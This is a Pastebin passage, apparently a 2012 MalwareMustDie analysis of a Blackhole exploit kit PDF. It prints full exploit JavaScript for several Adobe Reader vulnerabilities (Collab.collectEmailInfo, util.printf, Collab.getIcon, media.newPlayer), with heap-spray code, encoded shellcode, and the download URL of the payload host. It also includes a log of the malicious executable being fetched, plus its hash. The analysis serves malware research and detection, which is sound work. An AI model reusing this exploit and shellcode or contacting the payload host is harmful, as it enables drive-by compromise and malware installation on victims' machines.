uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u772f%u6675%u616a%u636a%u2e79%u7572%u6c2f%u6e69%u736b%u312f%u702e%u7068%u7a3f%u6765%u7171%u687a%u333d%u3a30%u6e31%u313a%u3a69%u6931%u333a%u2633%u7775%u6375%u313d%u3a6a%u6e31%u313a%u3a6d%u6c31%u313a%u3a6d%u7732%u333a%u3a31%u6a31%u313a%u3a6d%u6731%u6326%u776e%u313d%u2668%u726b%u6361%u6b3d%u7866%u2669%u617a%u6f67%u6d3d%u7371%u6a71%u7778%u0067%u0000';
  50.  
  51. // exploit
  52.  
  53.  function ezvr(ra,qy)
  54.  {
  55.    while(ra.length*2<qy)
  56.    {
  57.      ra+=ra
  58.    }
  59.    ra=ra.substring(0,qy/2);
  60.    return ra
  61.  }
  62.  function bx()
  63.  {
  64.    var dkg=new Array();
  65.    var vw=0x0c0c0c0c;
  66.    var addr=0x400000;
  67.    var payload=unescape(bjsg);
  68.    var sc_len=payload.length*2;
  69.    var qy=addr-(sc_len+0x38);
  70.    var yarsp=unescape("%u9090%u9090");
  71.    yarsp=ezvr(yarsp,qy);
  72.    var count2=(vw-0x400000)/addr;
  73.    for(var count=0;count<count2;count++)
  74.    {
  75.      dkg[count]=yarsp+payload
  76.    }
  77.    var overflow=unescape("%u0c0c%u0c0c");
  78.    while(overflow.length<44952)
  79.    {
  80.      overflow+=overflow
  81.    }                              // Here's the Collab.collectEmailInfo CVE-2007-5659 starts......
  82.    this.collabStore=Collab.collectEmailInfo(
  83.    {
  84.      subj:"",msg:overflow
  85.    }
  86.    )
  87.  }
  88.  function printf()
  89.  {
  90.    nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  91.    var payload=unescape(bjsg);
  92.    heapblock=nop+payload;
  93.    bigblock=unescape("%u0A0A%u0A0A");
  94.    headersize=20;
  95.    spray=headersize+heapblock.length;
  96.    while(bigblock.length<spray)
  97.    {
  98.      bigblock+=bigblock
  99.    }
  100.    fillblock=bigblock.substring(0,spray);
  101.    block=bigblock.substring(0,bigblock.length-spray);
  102.    while(block.length+spray<0x40000)
  103.    {
  104.      block=block+block+fillblock
  105.    }
  106.    mem=new Array();
  107.    for(i=0;i<1400;i++)
  108.    {
  109.      mem[i]=block+heapblock  
  110.    }                 // ↓the flood of char for BoF
  111.    var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
  112.    util.printf("%45000f",num)
  113.  }                              // Here's the Collab.getIcon Exploit CVE-2009-0927
  114.  function geticon()
  115.  {
  116.    var arry=new Array();
  117.    if(app.doc.Collab.getIcon)
  118.    {
  119.      var payload=unescape(bjsg);
  120.      var hWq500CN=payload.length*2;
  121.      var qy=0x400000-(hWq500CN+0x38);
  122.      var yarsp=unescape("%u9090%u9090");
  123.      yarsp=ezvr(yarsp,qy);
  124.      var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;
  125.      for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++)
  126.      {
  127.        arry[vqcQD96y]=yarsp+payload
  128.      }
  129.      var tUMhNbGw=unescape("%09");
  130.      while(tUMhNbGw.length<0x4000)
  131.      {
  132.        tUMhNbGw+=tUMhNbGw
  133.      }
  134.      tUMhNbGw="N."+tUMhNbGw;
  135.      app.doc.Collab.getIcon(tUMhNbGw)
  136.    }
  137.  }
  138.  aPlugins=app.plugIns;
  139.  var sv=parseInt(app.viewerVersion.toString().charAt(0));
  140.  for(var i=0;i<aPlugins.length;i++)
  141.  {
  142.    if(aPlugins[i].name=='EScript')
  143.    {
  144.      var lv=aPlugins[i].version
  145.    }
  146.  }
  147.  if((lv==9)||((sv==8)&&(lv<=8.12)))
  148.  {
  149.    geticon()
  150.  }
  151.  else if(lv==7.1)
  152.  {
  153.    printf()
  154.  }
  155.  else if(((sv==6)||(sv==7))&&(lv<7.11))
  156.  {
  157.    bx()
  158.  }
  159.  else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17))
  160.  {
  161.    function a()
  162.    {
  163.      util.printd('p@111111111111111111111111 : yyyy111',new Date())
  164.    }
  165.    var h=app.plugIns;
  166.    for(var f=0;f<h.length;f++)
  167.    {
  168.      if(h[f].name=='EScript')
  169.      {
  170.        var i=h[f].version
  171.      }
  172.    }
  173.    if((i>8.12)&&(i<8.2))
  174.    {
  175.      c=new Array();
  176.      var d=unescape('%u9090%u9090');
  177.      var e=unescape(bjsg);
  178.      while(d.length<=0x8000)
  179.      {
  180.        d+=d
  181.      }
  182.      d=d.substr(0,0x8000-e.length);
  183.      for(f=0;f<2900;f++)
  184.      {
  185.        c[f]=d+e
  186.      }
  187.      a();
  188.      a();
  189.      try
  190.      {
  191.        this.media.newPlayer(null)
  192.      }
  193.      catch(e)
  194.      {
  195.      }
  196.      a()
  197.    }
  198.  }
  199.  
  200. // grab the shellcode strings,
  201. %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u772f%u6675%u616a%u636a%u2e79%u7572%u6c2f%u6e69%u736b%u312f%u702e%u7068%u7a3f%u6765%u7171%u687a%u333d%u3a30%u6e31%u313a%u3a69%u6931%u333a%u2633%u7775%u6375%u313d%u3a6a%u6e31%u313a%u3a6d%u6c31%u313a%u3a6d%u7732%u333a%u3a31%u6a31%u313a%u3a6d%u6731%u6326%u776e%u313d%u2668%u726b%u6361%u6b3d%u7866%u2669%u617a%u6f67%u6d3d%u7371%u6a71%u7778%u0067%u0000
  202.  
  203. //strips the "%u" and save it as binary.
  204. // view it in the binary viewer you'll find like this:
  205.  
  206. 66 83 e4 fc fc 85 e4 75  34 e9 5f 33 cO 64 8b 4O   f......u4._3.d.@
  207. 3O 8b 4O Oc 8b 7O 1c 56  8b 76 O8 33 db 66 8b 5e   O.@..p.V.v.3.f.^
  208. 3c O3 74 33 2c 81 ee 15  1O ff ff b8 8b 4O 3O c3   <.t3,........@O.
  209. 46 39 O6 75 fb 87 34 24  85 e4 75 51 e9 eb 4c 51   F9.u..4$..uQ..LQ
  210. 56 8b 75 3c 8b 74 35 78  O3 f5 56 8b 76 2O O3 f5   V.u<.t5x..V.v...
  211. 33 c9 49 41 fc ad O3 c5  33 db Of be 1O 38 f2 74   3.IA....3....8.t
  212. O8 c1 cb Od O3 da 4O eb  f1 3b 1f 75 e6 5e 8b 5e   ......@..;.u.^.^
  213. 24 O3 dd 66 8b Oc 4b 8d  46 ec ff 54 24 Oc 8b d8   $..f..K.F..T$...
  214. O3 dd 8b O4 8b O3 c5 ab  5e 59 c3 eb 53 ad 8b 68   ........^Y..S..h
  215. 2O 8O 7d Oc 33 74 O3 96  eb f3 8b 68 O8 8b f7 6a   ..}.3t.....h...j
  216. O5 59 e8 98 ff ff ff e2  f9 e8 OO OO OO OO 58 5O   .Y............XP
  217. 6a 4O 68 ff OO OO OO 5O  83 cO 19 5O 55 8b ec 8b   j@h....P...PU...
  218. 5e 1O 83 c3 O5 ff e3 68  6f 6e OO OO 68 75 72 6c   ^......hon..hurl
  219. 6d 54 ff 16 83 c4 O8 8b  e8 e8 61 ff ff ff eb O2   mT........a.....
  220. eb 72 81 ec O4 O1 OO OO  8d 5c 24 Oc c7 O4 24 72   .r.......\$...$r
  221. 65 67 73 c7 44 24 O4 76  72 33 32 c7 44 24 O8 2O   egs.D$.vr32.D$..
  222. 2d 73 2O 53 68 f8 OO OO  OO ff 56 Oc 8b e8 33 c9   -s.Sh.....V...3.
  223. 51 c7 44 1d OO 77 7O 62  74 c7 44 1d O5 2e 64 6c   Q.D..wpbt.D...dl
  224. 6c c6 44 1d O9 OO 59 8a  c1 O4 3O 88 44 1d O4 41   l.D...Y...O.D..A
  225. 51 6a OO 6a OO 53 57 6a  OO ff 56 14 85 cO 75 16   Qj.j.SWj..V...u.
  226. 6a OO 53 ff 56 O4 6a OO  83 eb Oc 53 ff 56 O4 83   j.S.V.j....S.V..
  227. c3 Oc eb O2 eb 13 47 8O  3f OO 75 fa 47 8O 3f OO   ......G.?.u.G.?.
  228. 75 c4 6a OO 6a fe ff 56  O8 e8 9c fe ff ff 8e 4e   u.j.j..V.......N
  229. Oe ec 98 fe 8a Oe 89 6f  O1 bd 33 ca 8a 5b 1b c6   .......o..3..[..
  230. 46 79 36 1a 2f 7O 68 74  74 7O 3a 2f 2f 77 75 66   Fy6./phOOp://wuf
  231. 6a 61 6a 63 79 2e 72 75  2f 6c 69 6e 6b 73 2f 31   jajcy.ru/links/1
  232. 2e 7O 68 7O 3f 7a 65 67  71 71 7a 68 3d 33 3O 3a   .php?zegqqzh=3O:
  233. 31 6e 3a 31 69 3a 31 69  3a 33 33 26 75 77 75 63   1n:1i:1i:33&uwuc
  234. 3d 31 6a 3a 31 6e 3a 31  6d 3a 31 6c 3a 31 6d 3a   =1j:1n:1m:1l:1m:
  235. 32 77 3a 33 31 3a 31 6a  3a 31 6d 3a 31 67 26 63   2w:31:1j:1m:1g&c
  236. 6e 77 3d 31 68 26 6b 72  61 63 3d 6b 66 78 69 26   nw=1h&krac=kfxi&
  237. 7a 61 67 6f 3d 6d 71 73  71 6a 78 77 67 OO OO OO   zago=mqsqjxwg...
  238.  
  239. // The url is not obfuscated and plainly see in there↑
  240. // A typical Blackkhole v2.x download urls, PoC:
  241. // (here goes the payload..)
  242.  
  243. URL: h00p://wufjajcy.ru/links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg
  244. GET /links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg HTTP/1.0
  245. Referer: http://www.google.com/url?..
  246. User-Agent: MalwareMustDie is taking a break... running out of paint..
  247. Accept: */*
  248. Host: wufjajcy.ru
  249. Connection: Keep-Alive
  250. HTTP request sent, awaiting response...
  251. HTTP/1.1 200 OK
  252. Server: nginx/1.0.15
  253. Date: Sun, 30 Dec 2012 13:11:48 GMT
  254. Content-Type: application/x-msdownload
  255. Connection: keep-alive
  256. X-Powered-By: PHP/5.3.18
  257. Pragma: public
  258. Expires: Sun, 30 Dec 2012 13:12:19 GMT
  259. Cache-Control: must-revalidate, post-check=0, pre-check=0
  260. Cache-Control: private
  261. Content-Disposition: attachment; filename="calc.exe"
  262. Content-Transfer-Encoding: binary
  263. Content-Length: 23040
  264. ---response end---
  265. 200 OK
  266. Length: 23,040 (23K) [application/x-msdownload]
  267. 100%[=================> ] 23,040         3.49K/s    ETA 00:00
  268. 22:11:52 (3.49 KB/s) - `calc.exe' saved [23040/23040]
  269.  
  270. MD5:    42a4de1001682f27ad55c893af9bd23d
  271. File size:  22.5 KB ( 23040 bytes )
  272. File name:  calc.exe
  273. File type:  Win32 EXE
  274. Tags:   peexe
  275. Detection ratio:    12 / 46
  276. URL: https://www.virustotal.com/file/a18e6f7f5b98a74124ae74d1e3c62bcc52567913fb84c17ad1bad346e6b24583/analysis/1356877065/
  277.  
  278. ----
  279. MalwareMustDie!!!!
  280. analyzed by: @unixfreaxjp Crusade@Dec 30 2012
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!